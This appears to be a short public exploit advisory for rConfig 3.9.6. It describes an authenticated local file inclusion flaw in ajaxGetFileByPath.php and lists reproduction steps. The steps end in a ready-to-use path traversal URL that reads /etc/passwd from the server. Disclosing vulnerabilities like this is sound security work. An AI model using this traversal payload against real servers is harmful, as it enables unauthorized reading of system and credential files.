# Exploit Title: rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)# Date: 2021-03-12# Exploit Author: 5a65726f# Vendor Homepage: https://www.rconfig.com# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip# Version: rConfig v3.9.6# Install scripts:# https://www.rconfig.com/downloads/scripts/install_rConfig.sh# https://www.rconfig.com/downloads/scripts/centos7_install.sh# https://www.rconfig.com/downloads/scripts/centos6_install.sh# Tested on: centOS 7# Notes : If you want to reproduce in your lab environment follow those links :# http://help.rconfig.com/gettingstarted/installation# then# http://help.rconfig.com/gettingstarted/postinstall# Description:
rConfig, the open source network device configuration management tool,is vulnerable to local file inclusion in/lib/ajaxHandlers/ajaxGetFileByPath.php with parameter path.ajaxGetFileByPath.php allows authenticated users to download anyfile on the server.
The following steps can be carried out in duplicating this vulnerability.- Login the rConfig application with your credentials.- Enter the following link to your browser:
http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd
